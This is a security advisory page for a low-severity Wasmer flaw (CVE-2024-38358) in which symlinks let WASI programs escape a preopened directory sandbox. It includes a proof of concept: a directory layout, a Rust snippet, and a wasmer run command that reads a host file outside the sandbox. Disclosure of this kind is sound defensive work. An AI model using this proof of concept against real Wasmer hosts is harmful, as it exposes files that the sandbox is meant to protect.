Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS01NWYzLTNxdmctOHB2Nc4AA8zV
Symlink bypasses filesystem sandbox
Summary
If the preopened directory has a symlink pointing outside, WASI programs can traverse the symlink and access host filesystem if the caller sets both oflags::creat
and rights::fd_write
. Programs can also crash the runtime by creating a symlink pointing outside with path_symlink
and path_open
ing the link.
Details
PoC
Setup a filesystem as follows.
.
├── outside.file
└── preopen
└── dir
└── file -> ../../outside.file
Compile this Rust snippet with wasi
v0.11 (for the preview1 API).
fn main() {
unsafe {
let filefd = wasi::path_open(
5,
wasi::LOOKUPFLAGS_SYMLINK_FOLLOW,
"app/dir/file",
wasi::OFLAGS_CREAT,
wasi::RIGHTS_FD_READ | wasi::RIGHTS_FD_WRITE,
0,
0,
)
.unwrap();
eprintln!("filefd: {filefd}");
let mut buf = [0u8; 10];
let iovs = [wasi::Iovec {
buf: buf.as_mut_ptr(),
buf_len: buf.len(),
}];
let read = wasi::fd_read(filefd, &iovs).unwrap();
eprintln!("read {read}: {}", String::from_utf8_lossy(&buf));
}
}
Run the compiled binary with Wasmer preopening preopen/
:
wasmer run --mapdir /app:preopen a.wasm
This should not print the contents of the outside.file
. Other runtimes like Wasmtime can successfully block this call. But Wasmer prints the contents of the file.
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01NWYzLTNxdmctOHB2Nc4AA8zV
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Low
Classification: General
Published: 4 months ago
Updated: 3 months ago
CVSS Score: 2.9
CVSS vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
Identifiers: GHSA-55f3-3qvg-8pv5, CVE-2024-38358
References:
- https://github.com/wasmerio/wasmer/security/advisories/GHSA-55f3-3qvg-8pv5
- https://github.com/wasmerio/wasmer/commit/b9483d022c602b994103f78ecfe46f017f8ac662
- https://nvd.nist.gov/vuln/detail/CVE-2024-38358
- https://github.com/advisories/GHSA-55f3-3qvg-8pv5
Blast Radius: 8.3
Affected Packages
cargo:wasmer
Dependent packages: 136Dependent repositories: 730
Downloads: 4,306,395 total
Affected Version Ranges: <= 4.3.1
No known fixed version
All affected versions: 0.1.0, 0.17.0, 0.17.1, 1.0.0, 1.0.1, 1.0.2, 2.0.0, 2.1.0, 2.1.1, 2.2.0, 2.2.1, 2.3.0, 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.1.0, 3.1.1, 3.2.0, 3.2.1, 3.3.0, 4.0.0, 4.1.0, 4.1.1, 4.1.2, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.2.4, 4.2.5, 4.2.6, 4.2.8, 4.3.0, 4.3.1